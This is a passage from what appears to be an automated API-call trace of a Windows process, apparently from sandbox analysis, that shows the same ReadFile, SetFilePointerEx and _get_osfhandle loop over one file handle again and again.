lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.143] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.143] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.143] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.143] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.143] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.143] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.143] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.143] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.143] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.143] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.143] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.143] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.143] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.143] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.143] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.143] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.143] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.143] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.143] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.144] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.144] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.144] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.144] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.144] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.144] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.144] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.144] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.144] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.144] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.144] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.144] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.144] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.144] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.144] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.144] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.144] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.144] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.144] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.144] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.144] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.144] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.145] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.145] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.145] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.145] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.145] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.145] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.145] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.145] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.145] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.145] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.145] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.145] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.145] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.145] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.145] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.145] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.145] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.145] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.145] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.145] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.145] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.145] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.146] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.146] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.146] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.146] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.146] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.146] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.146] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.146] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.146] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.146] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.146] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.146] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.146] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.146] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.146] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.146] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.146] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.146] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.146] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.146] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.146] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.147] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.147] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.147] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.147] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.147] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.147] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.147] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.147] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.147] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.147] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.147] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.147] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.147] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.147] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.147] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.147] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.147] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.147] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.147] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.147] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.147] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.148] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.148] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.148] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.148] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.148] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.148] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.148] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.148] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.148] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.148] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.148] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.148] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.148] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.148] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.148] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.148] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.148] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.148] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.148] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.148] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.148] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.149] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.149] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.149] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.149] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.149] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.149] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.149] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.149] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.149] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.149] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.149] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.149] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.149] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.149] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.149] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.149] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.149] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.149] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.149] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.149] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.149] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.149] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.149] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.150] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.150] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.150] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.150] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.150] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.150] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.150] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.150] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.150] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.150] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.150] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.150] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.150] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.150] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.150] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.150] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.150] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.150] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.150] ReadFile 